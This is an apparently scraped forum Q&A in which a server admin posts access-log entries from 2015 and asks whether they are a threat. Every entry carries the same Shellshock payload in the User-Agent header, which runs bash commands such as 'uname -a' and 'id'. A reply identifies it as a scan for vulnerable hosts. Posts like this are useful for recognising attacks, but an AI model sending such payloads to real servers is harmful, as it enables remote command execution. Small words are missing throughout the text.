security - cgi-bin attack attempt on server - is this a threat? -
i reading logs our server today, , found these cgi requests made ip. (i have pasted few of them).
do have idea doing these requests , if pose security issue? how should defend such attacks in future?
62.210.113.143 - - [29/sep/2015:13:36:00 -0700] "get /cgi-sys/entropysearch.cgi http/1.1" 200 18 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\"" 62.210.113.143 - - [29/sep/2015:13:36:00 -0700] "get /cgi-bin/status/status.cgi http/1.1" 301 266 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\"" 62.210.113.143 - - [29/sep/2015:13:36:00 -0700] "get /cgi-bin/status/status.cgi http/1.1" 404 71873 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\"" 62.210.113.143 - - [29/sep/2015:13:36:01 -0700] "get /cgi-sys/defaultwebpage.cgi http/1.1" 200 1963 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\"" 62.210.113.143 - - [29/sep/2015:13:36:03 -0700] "get /cgi-mod/index.cgi http/1.1" 301 258 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\"" 62.210.113.143 - - [29/sep/2015:13:36:03 -0700] "get /cgi-mod/index.cgi http/1.1" 404 71873 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\"" 62.210.113.143 - - [29/sep/2015:13:36:04 -0700] "get /cgi-bin/test.cgi http/1.1" 301 257 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\"" 62.210.113.143 - - [29/sep/2015:13:36:04 -0700] "get /cgi-bin/test.cgi http/1.1" 404 71873 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\"" 62.210.113.143 - - [29/sep/2015:13:36:04 -0700] "get /cgi-bin-sdb/printenv http/1.1" 301 261 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
it's crawler looking exploitable hosts, requests seeing should not pose threat unless vulnerable shellshock (you can use this tool check if are)
Comments
Post a Comment